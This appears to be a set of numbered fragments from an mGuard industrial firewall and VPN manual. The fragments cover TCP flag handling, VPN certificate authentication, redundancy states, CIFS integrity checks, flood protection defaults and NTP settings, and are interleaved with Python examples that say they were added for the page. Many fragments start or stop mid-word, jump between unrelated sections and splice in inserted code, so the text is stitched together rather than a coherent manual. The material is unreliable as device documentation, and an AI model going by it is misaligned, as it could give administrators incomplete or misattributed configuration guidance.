Masquerading can be used in the following network modes: Router, PP
297. llow forwarding of GVRP frames.

Network Security menu

When set to Yes, the mGuard performs a range of tests to check for incorrect checksums, packet sizes etc. and drops packets that fail these tests. This option is set to Yes by default.

TCP packets without any flags set in their TCP header are normally rejected by firewalls. At least one type of Siemens controller with older firmware sends TCP keepalive packets without TCP flags set; these are therefore discarded as invalid by the mGuard. When set to Yes, forwarding of TCP packets with no TCP flags set in the header is enabled. This only applies to TCP packets of this type that are sent within an existing TCP connection established in the regular way; TCP packets without TCP flags do not result in a new entry in the connection table (see Connection Tracking on page 218). If the connection was already established when the mGuard is restarted, the corresponding packets are still rejected, and connection problems can be observed as long as no packets with flags belonging to the connection are sent. These settings affect all TCP packets without flags. The Yes option thus weakens the security functions provided by the mGuard.

This option controls the behavior of the mGuard when ICMP messages are received from the external network via the primary or secondary external interface. Regardless of the setting specified here, incoming ICMP packets are always ac
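The interaction between connection tracking and flagless TCP packets described above, modelled as an added Python example (illustrative code written for this page, not the mGuard's connection tracker). It reproduces the three points from the text: a flagless packet never creates a connection-table entry, with the option enabled it is forwarded only inside a known connection, and after a restart the empty table rejects the keepalives until a flagged packet of the connection is seen. The packet sequence is constructed, and the mid-stream pickup on a flagged packet after the restart is an assumption of this model.

```python
class ConnectionTracker:
    """Minimal model of TCP connection tracking with the 'forward flagless TCP' option."""

    def __init__(self, allow_flagless: bool = False):
        self.allow_flagless = allow_flagless  # the Yes/No option described above
        self.table = set()  # known connections as (src, sport, dst, dport)

    @staticmethod
    def _keys(pkt):
        fwd = (pkt["src"], pkt["sport"], pkt["dst"], pkt["dport"])
        rev = (pkt["dst"], pkt["dport"], pkt["src"], pkt["sport"])
        return fwd, rev

    def _known(self, pkt) -> bool:
        fwd, rev = self._keys(pkt)
        return fwd in self.table or rev in self.table

    def process(self, pkt: dict) -> str:
        """Returns 'accept' or 'drop' for one TCP packet."""
        flags = set(pkt["flags"])
        if not flags:
            # Flagless packets never create a table entry; with the option
            # enabled they are only forwarded inside a known connection.
            if self.allow_flagless and self._known(pkt):
                return "accept"
            return "drop"
        if flags == {"SYN"}:
            # Regular connection establishment creates the entry.
            self.table.add(self._keys(pkt)[0])
            return "accept"
        if self._known(pkt):
            return "accept"
        if "ACK" in flags:
            # Assumption of this model: a flagged mid-stream packet lets the
            # tracker pick the connection up again, e.g. after a restart.
            self.table.add(self._keys(pkt)[0])
            return "accept"
        return "drop"

    def restart(self) -> None:
        """A restart empties the connection table."""
        self.table.clear()


def scenario(allow_flagless: bool) -> list:
    """Constructed sequence: flagless keepalives before, during and after a restart."""
    ct = ConnectionTracker(allow_flagless)
    plc = {"src": "192.168.1.20", "sport": 40000, "dst": "10.0.0.5", "dport": 102}
    syn = dict(plc, flags=["SYN"])
    keepalive = dict(plc, flags=[])
    ack = dict(plc, flags=["ACK"])
    results = [ct.process(keepalive), ct.process(syn), ct.process(keepalive)]
    ct.restart()
    results += [ct.process(keepalive), ct.process(ack), ct.process(keepalive)]
    return results


if __name__ == "__main__":
    print(scenario(allow_flagless=True))
    print(scenario(allow_flagless=False))
```

Running both variants shows why the option is a trade-off: with it enabled the keepalive passes only after the connection has been seen, so the restart gap remains; with it disabled the keepalives are dropped in every state.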
298. low.

[Screenshot: Remote Certificate with Subject CN=VPN Endpunkt Maschine 06, O=BeispielLieferant, C=DE; Subject Alternative Names (none); Issuer CN=VPN SubCA 01, O=BeispielLieferant, C=DE; Validity from Mar 20 18:38:09 2007 GMT to Mar 20 18:33:09 2010 GMT; Fingerprint MD5 11:73:7D:98:89:6F:AB:DB:23:A1:22:06:A2:68:79:EC, SHA1 E9:14:0A:50:84:36:62:C5:B0:2F:1F:A7:FB:1E:89:47:30:53:BC:B3; Filename (.pem), Browse.]

IPsec VPN >> Connections >> Edit >> Authentication

Local X.509 Certificate: Specifies which machine certificate the mGuard uses to authenticate itself to the VPN partner. Select one of the machine certificates from the selection list. The list contains the machine certificates that have been loaded on the mGuard under the Authentication >> Certificates menu item. If None is displayed, a certificate must be installed first. None must not be left in place, as this results in no X.509 authentication.

How the mGuard authenticates the remote partner: The following definition relates to how the mGuard verifies the authenticity of the VPN remote partner. The table below shows which certificates must be provided for the mGuard to authenticate the VPN partner if the VPN partner shows one of the following certificate types when a connection is established:
- A machine certificate signed by a CA
- A self-signed machine certificate
299. ltering network traffic.
- active_waiting: The mGuard is actively forwarding and filtering network traffic. Additionally, the mGuard waits for a restarting component.
- active: The mGuard is actively forwarding and filtering network traffic.

[Screenshot: history of redundancy states with timestamps between Thu Oct 27 11:31:53 and 11:33:40 CEST 2011, with an Update button.] Please note: the table is sorted chronologically, starting with the most recent former state.

Redundancy >> FW Redundancy Status >> Redundancy Status

Current State: Possible states:
- booting: the mGuard is starting
- faulty: the mGuard is not yet connected properly
- outdated: state synchronization of the databases is not yet up to date
- on_standby: the mGuard is ready for activation

Status of the Components: Availability Check, Connectivity Checks, State Replication, Virtual Interface Controller.
300. ly opened exclusively by other programs, as this can lead to access conflicts.

CIFS Integrity Monitoring >> CIFS Integrity Checking >> Settings >> Edit >> Checked Share

Time Schedule: Every Sunday, Every Monday, Every Tuesday, ..., Every day, Several times a day, Continuous. You can start the check every day, several times per day or on a specific weekday. The mGuard system time must be set for the time schedule to work properly; integrity checks are not performed if the system time is not synchronized. Setting the time can be done manually or via NTP (see Time and Date on page 35). A check is only started if the mGuard is operating at the set time. If it is not operating at that time, the check is not performed later when the mGuard is started up again. The check can also be started manually (CIFS Integrity Monitoring >> CIFS Integrity Checking >> Settings >> Edit >> Management, Possible Actions).

Starting at: Time at which the check starts (hour, minute). If Several times a day is selected: every 1 h, 2 h, 3 h, 4 h, 6 h, 8 h, 12 h.

Maximum time a check may take: Maximum duration of the check sequence in minutes. You can thus ensure that the check is completed in good time, e.g. before a shift starts.

Checksum Memory

Checksum Algorithm: SHA-1, MD5, SHA-256. Checksum algorithms such as MD5, SHA-1 or SHA-256 are us
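The core of an integrity check of the kind described above (build a checksum memory, later compare the share against it), as an added Python example written for this page; it is not the mGuard's CIFS implementation. The share contents are constructed in-memory dictionaries standing in for files on a CIFS share, and the helper names are this example's own. The algorithm selector accepts the three names offered on the page; MD5 and SHA-1 are no longer collision resistant, so SHA-256 is the choice to prefer where the attacker may craft the modified file.

```python
import hashlib

ALGORITHMS = {"MD5": "md5", "SHA-1": "sha1", "SHA-256": "sha256"}

# Constructed share contents: path -> bytes. A real check walks the CIFS share.
SHARE_BEFORE = {
    "plc/program.bin": b"\x00\x01\x02\x03",
    "hmi/config.xml": b"<hmi><alarm>on</alarm></hmi>",
    "docs/readme.txt": b"nothing to see",
}
SHARE_AFTER = {
    "plc/program.bin": b"\x00\x01\x02\xff",  # modified
    "hmi/config.xml": b"<hmi><alarm>on</alarm></hmi>",  # unchanged
    "tools/dropper.exe": b"MZ...",  # added; docs/readme.txt removed
}


def checksum(data: bytes, algorithm: str = "SHA-256") -> str:
    """Checksum with one of the algorithms offered on the page."""
    h = hashlib.new(ALGORITHMS[algorithm])
    h.update(data)
    return h.hexdigest()


def build_checksum_memory(share: dict, algorithm: str = "SHA-256") -> dict:
    """The baseline: one checksum per file, taken while the share is known good."""
    return {path: checksum(data, algorithm) for path, data in share.items()}


def integrity_check(memory: dict, share: dict, algorithm: str = "SHA-256") -> dict:
    """Compare the current share against the stored checksum memory."""
    current = build_checksum_memory(share, algorithm)
    return {
        "added": sorted(set(current) - set(memory)),
        "removed": sorted(set(memory) - set(current)),
        "modified": sorted(p for p in memory if p in current and current[p] != memory[p]),
    }


if __name__ == "__main__":
    memory = build_checksum_memory(SHARE_BEFORE)
    print(integrity_check(memory, SHARE_AFTER))
```

The checksum memory must itself be stored where the monitored share cannot alter it; a baseline kept on the share it protects could be rewritten along with the files.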
301. m Console on page 139.

6.1.3 Dial-in

Only mGuard rs4000 3G, mGuard rs4000, mGuard centerport, mGuard industrial rs, mGuard blade, mGuard delta, EAGLE mGuard.

[Screenshot: Network >> Interfaces >> Dial-in: PPP dial-in options (Modem/PPP Off, Local IP 192.168.2.1, Remote IP 192.168.2.2, PPP Login name admin, PPP Password), Incoming Rules (PPP) with Log ID fw-serial-incoming and Outgoing Rules (PPP) with Log ID fw-serial-outgoing, each with columns Protocol, From IP, From Port, To IP, To Port, Action, Comment, Log, and an option "Log entries for unknown connection attempts".]

Network >> Interfaces >> Dial-in

PPP dial-in options: This menu item is not included in the scope of functions for the mGuard rs2000 3G and mGuard rs2000. Only mGuard rs4000 3G, mGuard rs4000, mGuard centerport, mGuard industrial rs, mGuard blade, mGuard delta, EAGLE mGuard. Should only be configured if the mGuard is to permit PPP dial-in via one of the following:
- A modem connected to the serial interface
- A built-in modem (option for the mGuard industrial rs)
- A built-in mobile network modem (mGuard rs4000 3G, mGuard rs4000)

PPP dial
302. m number of new incoming/outgoing TCP connections (SYN) per second: Incoming default setting 25; Outgoing default setting 75. Maximum values for the number of incoming and outgoing TCP connections allowed per second. These values are set to a level that can never be reached during normal practical operation. However, they can easily be reached in the event of attacks, thus providing additional protection. If there are special requirements in your operating environment, these values can be increased.

Network Security >> DoS Protection >> Flood Protection

ICMP: Maximum number of incoming/outgoing ping frames (ICMP Echo Request) per second: Incoming default setting 3; Outgoing default setting 5. Maximum values for the number of incoming and outgoing ping packets allowed per second. These values are set to a level that can never be reached during normal practical operation. However, they can easily be reached in the event of attacks, thus providing additional protection. If there are special requirements in your operating environment, these values can be increased. The value 0 means that no ping packets are allowed through or in

Stealth Mode: Maximum number of incoming/outgoing ARP requests or ARP replies per second (each): Default setting 500. Maximum values fo
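The flood protection thresholds described above, modelled as an added Python example (illustrative code written for this page, not the mGuard's rate limiter). DEFAULT_LIMITS carries the default values quoted on the page for TCP SYN, ICMP echo and ARP (the ARP limit applies in Stealth mode); the per-second fixed-window counter is this example's assumption about how the limit is enforced, and the packet streams are constructed.

```python
# Defaults from the Flood Protection page: (kind, direction) -> packets per second.
DEFAULT_LIMITS = {
    ("tcp_syn", "incoming"): 25, ("tcp_syn", "outgoing"): 75,
    ("icmp_echo", "incoming"): 3, ("icmp_echo", "outgoing"): 5,
    ("arp", "incoming"): 500, ("arp", "outgoing"): 500,  # Stealth mode only
}


class FloodProtection:
    """Per-second counters; a packet above the limit in the current second is dropped."""

    def __init__(self, limits=None):
        self.limits = dict(DEFAULT_LIMITS)
        if limits:
            self.limits.update(limits)  # raised values for special requirements
        self.counts = {}  # (kind, direction, second) -> packets already allowed

    def allow(self, kind: str, direction: str, now: float) -> bool:
        limit = self.limits[(kind, direction)]
        if limit == 0:
            return False  # 0 means nothing of this kind passes at all
        second = int(now)
        key = (kind, direction, second)
        seen = self.counts.get(key, 0)
        if seen >= limit:
            return False
        self.counts[key] = seen + 1
        # Forget counters older than the previous second.
        self.counts = {k: v for k, v in self.counts.items() if k[2] >= second - 1}
        return True


def simulate(kind: str, direction: str, rate: int, seconds: int, limits=None) -> int:
    """Offer `rate` packets per second for `seconds` seconds; return how many passed."""
    guard = FloodProtection(limits)
    passed = 0
    for s in range(seconds):
        for i in range(rate):
            if guard.allow(kind, direction, s + i / rate):
                passed += 1
    return passed


if __name__ == "__main__":
    # A SYN flood of 1000 packets/s for 5 s lets through only the default 25/s.
    print(simulate("tcp_syn", "incoming", 1000, 5))
```

A legitimate client opening a handful of connections per second is never affected, while a flood is clipped to the configured rate, which is what makes the defaults safe to leave in place on most networks.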
303. mGuard smart, mGuard pci, mGuard blade, mGuard delta: These devices must be updated successively while the relevant redundant device is disconnected.

If firewall redundancy is activated, the two mGuard devices of a redundant pair can be updated at the same time. mGuard devices that form a pair automatically decide which mGuard is to perform the update first while the other mGuard remains active. If the active mGuard is unable to boot within 25 minutes of receiving the update command because the other mGuard has not yet taken over, it aborts the update and continues to run using the existing firmware version.

Updating the firmware

There are two options for performing a firmware update:
1. You have the current package set file on your computer (the file name ends with .tar.gz) and you perform a local update.
2. The mGuard downloads a firmware update of your choice from the update server via the Internet and installs it.

Management >> Update >> Update

Local Update: The filename of the package set has the extension .tar.gz. The format of the filename you have to enter is update-a.b.c-d.e.f.tar.gz.

Online Update / Automatic Update: install the latest patch release (x.y.Z) or install the latest minor release (x.Y.z).

Note: It might be possible that there is no direct update from the currently installed version to the latest published minor release av
304. mGuard smart. After initial time synchronization, the mGuard regularly compares the system time with the time servers. Fine adjustment of the time is usually only made in the seconds range.

NTP State: Displays the current NTP status. Shows whether the NTP server running on the mGuard has been synchronized with the configured NTP servers to a sufficient degree of accuracy. If the system clock of the mGuard has never been synchronized prior to activation of NTP time synchronization, synchronization can take up to 15 minutes. The NTP server nevertheless sets the mGuard system clock to the current time after a few seconds, as soon as it has successfully contacted one of the configured NTP servers. The system time of the mGuard is then regarded as synchronized. Fine adjustment of the time is usually only made in the seconds range.

NTP Server: Enter one or more time servers from which the mGuard should obtain the current time. If several time servers are specified, the mGuard automatically connects to all of them to determine the current time.

4.1.3 Shell Access

[Screenshot: Management >> System Settings >> Shell Access: Enable SSH remote access Yes. Note: After updating the keys, an SSH connection to the mGuard will show a warning message about changed SSH keys. Sections Concurrent Session Limits and Allowed Networks.]
305. mented using the command line of the mGuard. If an external modem is connected to the serial interface, you may have to enter the corresponding settings below under External Modem, regardless of the use of the serial port and the modem connected to it.

Network >> Interfaces >> Modem/Console

Serial Console: The following settings for Baudrate and Hardware handshake are only valid for a configuration connection where a terminal or a PC with a terminal program is connected to the serial interface as described above. The settings are not valid when an external modem is connected; settings for this are made further down under External Modem.

Baudrate: The transmission speed of the serial interface is specified via the selection list.

Hardware handshake: Off / On (RTS/CTS). When set to On, flow is controlled by means of the RTS and CTS signals.

External Modem: This menu item is not included in the scope of functions for the mGuard rs2000 3G and mGuard rs2000. (Settings: Hardware handshake RTS/CTS, Baudrate, Handle modem transparently for dial-in only, Modem init string.)

Serial console via USB: Only for mGuard smart. No / Yes. When No is selected, the mGuard smart uses the USB connection solely as a power supply. When Yes is selected, the mGuard smart provides an
306. milliseconds / 420 milliseconds.

[Screenshot: Connectivity Status for target 172.16.66.18 with the trace sRsRsRsRsRsRsRsRsRsRsRsRsRsRsRsR, summarized result success, connected; Ethernet link detection only; 300 milliseconds / 420 milliseconds.]

Legend: s = ICMP echo request sent; R = ICMP echo response received; F = missing ICMP echo response; _ = no ICMP echo request sent.

Redundancy >> FW Redundancy Status >> Connectivity Status

External Interface:
- Summarized result: success / fail. Result of the connectivity check for the external interface. The fail result is also displayed until the specific result of the connectivity check is known. The last two intervals of the connectivity check are taken into consideration for the combined result; success is only displayed if both were successful. "success (longer due to waiting time)" is displayed if the time an error was present was shorter than set under Waiting time prior to switching in the Redundancy >> Firewall Redundancy >> Redundancy menu.
- Ethernet link status: Shows whether the Ethernet connection has been established.
- Number of check intervals: Number of completed check intervals. When the counter is full, a message is displayed in front of the number.
- Kind of check: Repeats the setting for the connectivity check (see Kind of check on page 313).

Redundancy >> FW Redundan
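The connectivity check as described in 13.1.2 (primary and secondary targets, the "at least one target must respond" kind of check) together with the summarized result described here (success only if the last two intervals succeeded, fail until two results are known), modelled as an added Python example written for this page; it is not the mGuard's own implementation. The reply data per interval is constructed, the trace rendering reuses the s/R/F letters from the legend, and "all targets must respond" is included as an assumed second kind of check that does not appear on this page.

```python
KIND_ANY = "at least one target must respond"  # the kind shown on the page
KIND_ALL = "all targets must respond"  # assumed second kind, not on this page


def interval_result(kind: str, replies: dict) -> bool:
    """One check interval; replies maps target -> True if an ICMP echo reply arrived."""
    if kind == KIND_ANY:
        return any(replies.values())
    if kind == KIND_ALL:
        return all(replies.values())
    raise ValueError(kind)


def check_interval(kind: str, primary: dict, secondary: dict = None) -> bool:
    """Secondary targets are only consulted if the check of the primary targets failed."""
    if interval_result(kind, primary):
        return True
    if secondary:
        return interval_result(kind, secondary)
    return False


def summarized_result(history: list) -> str:
    """success only if the last two completed intervals were both successful;
    fail is shown until two results are known."""
    if len(history) < 2:
        return "fail"
    return "success" if history[-1] and history[-2] else "fail"


def run_checks(kind: str, intervals: list) -> list:
    """intervals: list of (primary replies, secondary replies); returns the summary per interval."""
    history, summaries = [], []
    for primary, secondary in intervals:
        history.append(check_interval(kind, primary, secondary))
        summaries.append(summarized_result(history))
    return summaries


def trace(replies_per_interval: list) -> str:
    """Render one target's history as on the status page: s = request sent, R = reply, F = missing."""
    return "".join("s" + ("R" if r else "F") for r in replies_per_interval)


# Constructed check history: gateway 10.0.0.1 and partner mGuard 10.0.0.31 as primary
# targets, 10.0.0.2 as secondary target.
INTERVALS = [
    ({"10.0.0.1": True, "10.0.0.31": False}, None),
    ({"10.0.0.1": False, "10.0.0.31": False}, {"10.0.0.2": True}),
    ({"10.0.0.1": False, "10.0.0.31": False}, {"10.0.0.2": False}),
    ({"10.0.0.1": True, "10.0.0.31": True}, None),
    ({"10.0.0.1": True, "10.0.0.31": True}, None),
]

if __name__ == "__main__":
    print(run_checks(KIND_ANY, INTERVALS))
    print(trace([p["10.0.0.1"] for p, _ in INTERVALS]))
```

The third interval fails even though a secondary target is configured, and because the combined result looks at two intervals, the status only returns to success one full interval after the targets become reachable again; this lag is what the waiting time before switching has to be tuned against.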
307. models (see Network >> Interfaces on page 105).

Stealth (default setting): mGuard rs4000/rs2000, mGuard industrial rs, mGuard smart, mGuard pci SD, mGuard pcie SD, mGuard pci, mGuard delta, EAGLE mGuard.

Stealth mode (Plug-n-Protect) is used to protect a single computer or a local network with the mGuard. Important: if the mGuard is in Stealth network mode, it is inserted into the existing network (see figure) without changing the existing network configuration of the connected devices.

[Figure: Before / After: the mGuard is inserted between the computer and the network; a LAN can also be on the left.]

The mGuard analyzes the active network traffic and configures its network connection accordingly. It then operates transparently, i.e. without the computers having to be reconfigured. As in the other modes, the firewall and VPN security functions are available. Externally supplied DHCP data is allowed through to the connected computer. If the mGuard is to provide services such as VPN, DNS, NTP etc., a firewall installed on the computer must be configured to allow ICMP echo requests (ping).

In Stealth mode the mGuard uses the internal IP address 1.1.1.1. This can be accessed from the computer if the default gateway configured on the computer is accessible. In Stealth network mode, a secondary external in
308. n, it means that no password is being used, for example because redundancy has not been activated or the firmware is booting up.

Redundancy >> Firewall Redundancy >> Redundancy

If an mGuard fails while the password is being changed, the following scenarios apply:
- Password replacement has been started on all mGuard devices and then interrupted, for example because of a network error. This scenario is rectified automatically.
- Password replacement has been started on all mGuard devices, but an mGuard then fails and must be replaced. Examine the remaining mGuard to determine whether the process of changing the password has been completed. If you can see a green check mark, set the new password directly on the replacement mGuard. If you cannot see a green check mark, the password has not yet been changed on the remaining mGuard; in this case change the password again on the mGuard that is still in operation and wait until the green check mark appears. Only then should you replace the mGuard that has failed. Configure the replacement mGuard with the new password immediately on setting up redundancy.
- Password replacement has been started but not performed on all mGuard devices because they have failed. Password replacement must be started as soon as a faulty mGuard is back online.

If an mGuard has been
309. n the definition of the VPN connection.

Verbose Logging

Verbose modem logging: Only available if an internal or external modem is available and switched on. Internal modem: mGuard rs4000/rs2000 3G, mGuard industrial rs with internal analog modem or ISDN modem. External modem: mGuard rs4000/rs2000, mGuard rs4000/rs2000 3G, mGuard centerport, mGuard industrial rs, mGuard blade, mGuard delta, EAGLE mGuard.

Verbose mobile network logging: Only available with the mGuard rs4000/rs2000 3G.

Logging >> Browse local logs

[Screenshot: list of local log entries with timestamps from 2011-10-26 15:48:45 to 2011-10-27 11:31:45.]
310. nagement menu

Activate traps: Yes / No.

enterprise-oid: mGuardTrapVPN; generic-trap: enterpriseSpecific; specific-trap: mGuardTrapVPNL2TPConnStatus (3); additional: mGuardTResVPNName, mGuardTResVPNIndex, mGuardTResVPNPeer, mGuardTResVPNStatus, mGuardTResVPNLocal, mGuardTResVPNRemote. This trap is sent when the status of an L2TP connection changes.

Mobile network traps: Enables traps for the mobile phone connection. Traps are sent when a text message is received, a call is received or the mobile phone connection drops.

Trap destinations: Traps can be sent to multiple destinations.
- Destination IP: IP address to which the trap should be sent.
- Destination Port: Default 162. Destination port to which the trap should be sent.
- Destination Name: Optional name for the destination. Does not affect the generated traps.
- Destination Community: Name of the SNMP community to which the trap is assigned.

4.5.3 LLDP

[Screenshot: Management >> SNMP >> LLDP: LLDP Mode Enabled; Internal/LAN interface MAC 00:40:45:06:61:69, 192.168.0.12; External/WAN interface MAC 00:0C:BE:04:1B:DB, 192.168.42.22, Port 5, FL SWITCH SMCS, WAN port, rs4000 master.]

LLDP (Link Layer Discovery Protocol, IEEE 802.1AB-D13) uses suitable request methods to automatically determine the Ethernet network infrastructure. LLDP-capable devices periodically send E
311. ncrypted and stored on an ECS. When set to Yes, the ECS is accessed during the boot process.

Profiles on an external storage medium

mGuard rs4000/rs2000 3G, mGuard rs4000/rs2000, mGuard delta, mGuard pci SD, mGuard pcie SD, EAGLE mGuard, mGuard centerport:
- EAGLE mGuard: the configuration profiles can also be stored on external configuration storage (ECS).
- mGuard centerport and EAGLE mGuard with USB interface: the configuration profiles can also be stored on a USB stick. This must have the following properties: FAT file system on the first primary partition; at least 64 MB free memory capacity.
- mGuard rs4000/rs2000 3G, mGuard rs4000/rs2000, mGuard delta, mGuard pci SD, mGuard pcie SD: configuration profiles can also be stored on an SD card (up to 2 GB capacity). It must have the following properties: FAT file system on the first primary partition; at least 64 MB free memory capacity; certified and released by Innominate Security Technologies AG (the current release list can be found at www.innominate.com).

Saving a profile to an external storage medium:
- EAGLE mGuard: connect the ECS to the V.24 socket (ACA11) or USB socket (ACA21). Type ACA21 ECS devices are not suitable for manual modification by a computer or similar.
- mGuard centerport and EAGLE mGuard with USB interface: insert the USB stick into the USB socket.
- mGuard rs4000/rs2000 3G
312. nction takes effect, and the number of characters defined above under Repetition Rate are generated per second. Default: 250.

4.1.2 Time and Date

Set the time and date correctly. Otherwise certain time-dependent activities cannot be started by the mGuard (see Time-controlled activities on page 37).

[Screenshot: Management >> System Settings >> Time and Date: Current system time (UTC) Monday, August 4, 2014 12:57:43; Current system time (local) Monday, August 4, 2014 14:57:43; System time state: Synchronized by hardware clock; Local system time 2014-08-04 14:57:00 (YYYY-MM-DD HH:MM:SS); Timezone in POSIX.1 notation CET-1CEST,M3.5.0,M10.5.0/3 (e.g. CET-1 for the EU, or CET-1CEST,M3.5.0,M10.5.0/3 with automatic daylight saving time switching); NTP State: NTP server is disabled; NTP server pool.ntp.org.]

Management >> System Settings >> Time and Date

Current system time (UTC): The current system time is displayed as Coordinated Universal Time (UTC). If Enable NTP time synchronization is not yet activated (see below) and Time stamp in filesystem is deactivated, the clock starts at January 1, 2000.

Current system time (local): Display. If the (sometimes different) current local time is to be displayed, the corresponding entry must be made under Timezone in POSIX.1 notation (see below).
redundancy connectivity check failed (check)
The internal modem is offline (modem)
No network link on LAN1 / LAN2 / LAN3 / LAN4 / LAN5 (link_swp0 .. link_swp4); No network link on DMZ (link_dmz)
State of Power Supply 1: Power supply 1 working (ok); Power supply 1 out of order (fail) [ihal power psu1]
State of Power Supply 2: Power supply 2 working (ok); Power supply 2 out of order (fail) [ihal power psu2]
State of the Input CMD 1: Service input 1 activated (on); Service input 1 deactivated (off) [ihal service cmd1]
State of the Input CMD 2: Service input 2 activated (on); Service input 2 deactivated (off) [ihal service cmd2]
State of the Input CMD 3: Service input 3 activated (on); Service input 3 deactivated (off) [ihal service cmd3]
Board temperature state: Temperature OK (ok); Temperature too hot (hot); Temperature too cold (cold) [ihal temperature board_alarm]
Temporary state of the secondary external interface: On standby (no); Temporarily up (yes) [network ext2up]
State of the modem: Offline (offline); Dialing (dialing); Online (online); Initialized, waiting (init) [network modem state]

Table 4-1 Event table (continued): Plaintext / Machine-readable
Status of the redundancy
redundancy functions are not available on the mGuard rs2000 and mGuard rs2000 3G.

There are several different ways of compensating for errors with the mGuard so that an existing connection is not interrupted:
- Firewall redundancy: two identical mGuard devices can be combined to form a redundant pair, meaning one takes over the functions of the other if an error occurs.
- VPN redundancy: an existing firewall redundancy forms the basis for VPN redundancy. In addition, the VPN connections are designed so that at least one mGuard in a redundant pair operates the VPN connections.
- Ring/network coupling: in ring/network coupling another method is used. Parts of a network are designed to be redundant; in the event of an error the alternative path is selected.

16.1 Firewall redundancy

Using firewall redundancy it is possible to combine two identical mGuard devices into a redundant pair (a single virtual router). One mGuard takes over the functions of the other if an error occurs. Both mGuard devices run synchronously, meaning an existing connection is not interrupted when the device is switched.

[Figure 16-1 Firewall redundancy example: a primary mGuard and a secondary mGuard in parallel between the internal network and the external network.]

Basic requirements for firewall redundancy

A license is required for the firewall redundancy function. It can only be used if the corresponding license has been purchased
redundancy status subsystem (plaintext / machine-readable):
- faulty: The device does not yet have proper connectivity or cannot determine it for sure.
- faulty_waiting: The device does not yet have proper connectivity or cannot determine it for sure, and waits for a restarting component.
- outdated: The device has empty or outdated firewall or VPN state information which it wants to resynchronize.
- outdated_waiting: The device has empty or outdated firewall or VPN state information which it wants to resynchronize, and waits for a restarting component.
- on_standby: The device is on standby.
- on_standby_waiting: The device is on standby and waits for a restarting component.
- becomes_active: The device becomes active.
- active: The device is actively forwarding and filtering network traffic.
- active_waiting: The device is actively forwarding and filtering network traffic and waits for a restarting component.
- becomes_standby: The device transitions to the hot-standby state.

VPN Connection Preparation state (vpn con armed): Stopped; Not all IPsec SAs established; All IPsec SAs established.
Activation state of a Firewall rule record (fwrules state): The state of the firewall rule record has changed.
VPN Connection IPsec SA (vpn con ipsec): No IPsec SAs established (no); IPsec SAs established (yes, up).

4.2 Management >> Web Settings

4.2.1 General

[Screen: Management >> Web Settings >> General, tabs General and Access; Language: English.]
seconds for which the network configuration assigned to the computer is valid. The client should renew its assigned configuration shortly before this time expires; otherwise the address may be assigned to other computers.

(With enabled dynamic IP address pool) The start of the address range from which the DHCP server of the mGuard assigns IP addresses to locally connected computers.

(With enabled dynamic IP address pool) The end of the address range from which the DHCP server of the mGuard assigns IP addresses to locally connected computers.

Specifies the subnet mask of the computers. Default: 255.255.255.0.

Specifies the broadcast address of the computers.

Specifies which IP address the computers should use as the default gateway. Usually this is the internal IP address of the mGuard.

Address of the server used by the computers to resolve host names into IP addresses via the Domain Name Service (DNS). If the DNS service of the mGuard is to be used, enter the internal IP address of the mGuard here.

Address of the server used by the computers to resolve host names into addresses via the Windows Internet Naming Service (WINS).

Network >> DHCP >> Internal DHCP, Static Mapping

MAC address: To find out the MAC address of your computer, proceed as follows:
- Windows 95/98/ME: start winipcfg in a DOS box.
- Windows NT/2000/XP: start ipconfig /all in a command prompt.
The MAC address
connections with a specific partner.

DMZ: can only be selected in Router mode. VPN connections can then be established to hosts in the DMZ and IP packets can be routed from the DMZ into a VPN connection.

Implicitly selected by the IP address specified to the right: an IP address is used instead of a dedicated interface.

IPsec VPN >> Connections >> Edit >> General

Connection startup: Initiate / Initiate on traffic / Wait
- Initiate: The mGuard initiates the connection to the partner. In the Address of the remote site's VPN gateway field (see above) the fixed IP address of the partner or its name must be entered.
- Initiate on traffic: The connection is initiated automatically when the mGuard sees that the connection should be used. Can be selected for all operating modes of the mGuard (Stealth, Router etc.).
- Wait: The mGuard is ready to allow the connection that a remote partner actively initiates and establishes. If %any is entered under Address of the remote site's VPN gateway, Wait must be selected.

Controlling service input: Only available with the mGuard rs4000/rs2000 3G, mGuard rs4000/rs2000 and mGuard industrial rs. None / Service input CMD 1-3. The VPN connection can be switched via a connected push-button or switch. The push-button or switch must be connected to one of the service contacts
partner. The value 0 results in unlimited attempts for connections initiated by the mGuard; otherwise it results in 5 attempts.

Yes/No. When set to Yes, the mGuard will attempt to negotiate a new key when the old one expires.

If the partner supports the Dead Peer Detection (DPD) protocol, the partners can detect whether the IPsec connection is still valid and whether it needs to be established again.

Delay between requests for a sign of life: Duration in seconds after which DPD keep-alive requests should be transmitted. These requests test whether the partner is still available. Default setting: 30 seconds.

IPsec VPN >> Connections >> Edit >> IKE Options

Timeout for absent sign of life after which peer is assumed dead: Duration in seconds after which the connection to the partner should be declared dead if there has been no response to the keep-alive requests. Default setting: 120 seconds. If the mGuard finds that a connection is dead, it responds according to the setting under Connection startup (see the definition of this VPN connection under Connection startup on the General tab page). Note that the timeout should be a multiple of the delay so that several unanswered requests, not a single lost packet, are needed before the tunnel is torn down.

10.3 IPsec VPN >> L2TP over IPsec

These settings are not applied in Stealth mode. It is not possible to use the MD5 algorithm under Windows 7. The MD5
General, Router network mode, PPTP (router mode PPTP)

For access to the Internet, the Internet service provider (ISP) provides the user with a user name (login) and password. These are requested when you attempt to establish a connection to the Internet.

PPTP Login: The user name (login) required by the Internet service provider when you attempt to establish a connection to the Internet.

PPTP Password: The password required by the Internet service provider when you attempt to establish a connection to the Internet.

Local IP Mode: Via DHCP / Static (from field below)
- Via DHCP: If the address data for access to the PPTP server is provided by the Internet service provider via DHCP, select Via DHCP. In this case no entry is required under Local IP.
- Static (from field below): If the address data for access to the PPTP server is not supplied by the Internet service provider via DHCP, the local IP address must be specified.

Local IP: The IP address via which the mGuard can be accessed by the PPTP server.

Modem IP: The address of the PPTP server of the Internet service provider.

Internal Networks: See Internal Networks on page 123.

Secondary External Interface: See Secondary External Interface on page 116. This menu item is not included in the scope of functions of the mGuard rs2000 3G and mGuard rs2000.

Router network mode, Modem (router mode
network failure may have caused the check to be unsuccessful. The mGuard then attempts to connect to the configuration server again based on the old configuration that has been reapplied, and attempts to download the newly offered configuration profile again. If this is unsuccessful, another rollback is performed. The selection criterion is enforced again for the further load cycles, as often as is defined in the Number of times field.

Management >> Central Management >> Configuration Pull

If the value in the Number of times field is 0, the selection criterion (the offered configuration profile is ignored if it remains unchanged) is never enforced. As a result, the second of the following objectives can no longer be met.

This mechanism has the following objectives:
1. After applying a new configuration, it must be ensured that the mGuard can still be configured from a remote location.
